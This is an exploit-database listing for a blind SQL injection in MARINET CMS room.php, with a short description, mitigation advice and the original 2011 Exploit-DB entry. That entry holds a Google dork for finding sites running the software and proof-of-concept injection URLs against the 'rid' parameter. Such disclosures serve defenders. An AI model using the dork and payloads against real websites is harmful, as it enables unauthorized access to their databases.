MARINET CMS (room.php) - exploit.company

vendor:

MARINET CMS

by:

BHG Security Center

5.5

CVSS

MEDIUM

Blind SQL Injection

CWE

Product Name: MARINET CMS

Affected Version From: All versions

Affected Version To: Final version

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2011

MARINET CMS (room.php) <= Blind SQL Vulnerability

The MARINET CMS room.php script is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by manipulating the 'rid' parameter in the URL to inject SQL statements, potentially gaining unauthorized access to the database.

Mitigation:

Upgrade to a patched version of MARINET CMS that addresses this vulnerability. Alternatively, implement input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

====================================================
MARINET CMS (room.php) <= Blind SQL Vulnerability
====================================================
 
 
# Exploit Title: MARINET CMS (room.php) <= Blind SQL Vulnerability
# Date: 30 - 09 - 2011
# Author: BHG Security Center
# Software Link: http://www.marinet.gr/
# Contact : http://black-hg.org
# Version: Final
# Google dork: inurl:room.php?rid=1 "POWERED BY MARINET"
# Tested on: Linux
 
[*] ## ExPLo!T:
 
 
http://localhost/room.php?rid=[SQL]

http://localhost/room.php?rid=1+and+1=0--

=================================**BHG Security 
Center**==================================|
# Greets To 
:                                                                             |
  Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn 
~ cmaxx  |
  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , Immortal Boy ~ 
farbodmahini ~ xb0y |
==========================================================================================|